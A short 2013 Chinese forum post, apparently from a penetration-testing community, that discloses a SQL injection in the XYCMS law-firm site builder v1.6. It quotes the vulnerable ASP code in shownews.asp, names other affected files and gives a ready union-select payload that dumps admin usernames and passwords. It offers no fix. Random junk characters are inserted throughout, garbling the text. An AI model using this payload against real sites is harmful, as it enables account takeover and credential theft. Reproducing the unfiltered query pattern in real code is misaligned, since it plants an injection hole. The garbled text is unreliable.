中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似7 F* {/ a0 Z: o  c% o3 s6 z# Q& [2 k

+ n1 L  w7 l% h* c! s% [4 P$ P淫荡分割线
" S  M- C' d3 E" ~9 L5 E--------------------------------------------------------% `+ b  V( K2 R. m- k8 s3 e' Z

3 j7 @4 p; T7 d  b审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), G2 {3 r7 ~& `; D7 S+ ~- ]& K
源码地址:http://down.chinaz.com/soft/29233.htm
2 F2 e4 e6 ?) B& x7 W
0 Q) W3 n2 j% v* M. X漏洞文件:shownews.asp
( E$ W7 d" ~& M4 w1 c, B漏洞代码:7-13行
" r. W+ W" |: A, O) V: { . k6 X$ a1 V1 N, E$ _9 [+ J

- V. h) X7 t7 i% A: ]<% * a- u: Y" K9 U$ i' Y
id=request.QueryString("id")6 Z! G$ D' G4 b$ f% m
    . A3 H% Z, u+ P
set snews=server.createobject("adodb.recordset") 5 r. d; m/ b% |! b
exec="select * from [news] where id="&id4 a, y  y4 q9 k$ |+ `( s1 f
snews.open exec,conn,1,1
! H  Y9 p" H3 R  B; `) o* J%>7 N) I2 \8 p0 T, d% L2 Q2 q

3 `# D& e6 d( s# v. _ 8 J, o$ q8 g8 M
什么过滤都没有  直造成注入5 a; q3 V5 d. a& E+ k. Z" y* J

" F( f  P0 N" s/ S5 E. ^4 A注入点:http://127.0.0.1:99/shownews.asp?id=xx
. A! m9 E6 k. C. l" C
$ K$ ?" }* I  R+ m' Z/ Q7 ^其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
( a, b9 H- S4 \9 k2 ^" A9 ^% [ . a$ M- a3 e+ `% I4 s+ j) V

; L: ]5 X( e) X, \" o% U' S2 i2 }1 aexp: union select 1,admin,password,4,5,7 from admin_user; l! B6 q+ @6 v# \) W" B
  `! w+ M* d4 S# p- y5 U





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2